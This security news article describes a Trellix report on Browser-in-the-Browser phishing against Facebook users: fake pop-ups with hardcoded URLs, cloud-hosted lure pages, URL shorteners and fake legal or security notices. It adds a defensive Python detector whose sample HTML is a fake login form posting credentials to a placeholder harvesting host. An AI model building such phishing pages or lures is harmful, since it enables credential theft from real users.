The era of easily spotting phishing emails by checking the URL bar may be coming to an end. A new report from Trellix highlights a disturbing surge in sophisticated phishing campaigns targeting Facebook’s 3 billion users, utilizing a technique known as “Browser-in-the-Browser” (BitB) to make fake login pages nearly indistinguishable from the real thing.
Observed escalating in the second half of 2025, this new wave of attacks combines advanced technical deception with trusted cloud infrastructure to bypass traditional security filters and trick even vigilant users.
The most dangerous evolution identified in the report is the “Browser-in-the-Browser” technique. Instead of directing users to a suspicious URL that can be easily flagged, attackers are simulating a legitimate pop-up window entirely within the victim’s existing browser tab.
“This sophisticated method is known as the ‘Browser-in-the-Browser’ (BitB) technique,” the report explains. “It exploits the public’s familiarity with login pop-up windows to steal user credentials”.
To the user, it looks perfect. The fake window displays the correct Facebook URL, green lock icons, and trusted branding. However, “Checking the code reveals that the Facebook URL was hardcoded,” meaning the address bar is merely a visual fabrication designed to mask the credential-harvesting page underneath.
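As an added illustration (not code from the Trellix report or from Meta), the following Python heuristic scans fetched page HTML for the two traits just described: a Facebook URL painted as plain text rather than a real link, and a password form that posts somewhere other than facebook.com. The sample HTML and the `harvest.example.invalid` host are constructed placeholders.

```python
# Added defensive example (not from the Trellix report): flag the BitB traits
# described above in fetched HTML, namely a brand URL painted as plain text
# and a password form that posts away from the brand's own domain.
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOST = "facebook.com"             # host the page claims to be
URL_MARKER = "https://www.facebook.com"   # should only appear inside a real <a>

class BitBScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_anchor = 0          # depth of open <a> tags
        self.form_actions = []      # every form action seen
        self.has_password = False   # any <input type="password">?
        self.painted_urls = []      # brand URL seen as bare text (fake address bar)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            self.in_anchor += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

    def handle_endtag(self, tag):
        if tag == "a" and self.in_anchor:
            self.in_anchor -= 1

    def handle_data(self, data):
        if not self.in_anchor and URL_MARKER in data:
            self.painted_urls.append(data.strip())

def bitb_indicators(html: str) -> list[str]:
    """Return human-readable indicators; an empty list means none fired."""
    s = BitBScanner()
    s.feed(html)
    found = [f"brand URL painted as text: {u}" for u in s.painted_urls]
    for action in s.form_actions:
        host = urlparse(action).hostname or ""
        trusted = host == TRUSTED_HOST or host.endswith("." + TRUSTED_HOST)
        if s.has_password and not trusted:
            found.append(f"password form posts to {host or '(relative path)'}")
    return found

# Constructed sample: fake "popup" div with a painted address bar and a
# credential form posting to a placeholder attacker-controlled host.
SAMPLE_BITB = """<div class="popup"><div class="addressbar">https://www.facebook.com/login</div>
<form action="https://harvest.example.invalid/collect" method="post">
<input type="email" name="u"><input type="password" name="p"></form></div>"""
```

A real login page passes cleanly because its URL appears only in the address bar, not in the page's text, and its form posts to the brand's own domain.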

Beyond the visual trickery, attackers are upgrading their backend infrastructure. The report notes a shift towards abusing legitimate cloud platforms like Netlify and Vercel to host these phishing pages.
By hosting their attacks on reputable domains, scammers can “evade security filters and lend a false sense of security to phishing pages”. A typical attack flow might involve a fake “Meta copyright infringement” notice hosted on Netlify, which redirects users to a Vercel-hosted appeal form that eventually demands their password.
Scammers are also utilizing URL shorteners like Lnk.ink and rebrand.ly to further mask the final destination of their malicious links.
The campaigns often begin with high-pressure social engineering. Trellix observed several recurring themes:
- Fake Legal Notices: Emails disguised as communications from law firms regarding “infringing videos”.
- Account Violations: Warnings that a page or business account has violated community standards.
- Security Alerts: False alarms about unauthorized logins or system checks requiring immediate re-verification.
This evolution in tactics signals that standard user awareness training—such as “check the URL”—is no longer sufficient.
“Most critically, the emergence of the Browser-in-the-Browser (BitB) technique represents a major escalation,” the report warns. “By creating a custom-built, fake login pop-up window within the victim’s browser, this method capitalizes on user familiarity with authentication flows, making credential theft nearly impossible to detect visually”.
Defenders are urged to adopt a multi-layered defense strategy that goes beyond simple visual inspection to combat these technically complex campaigns.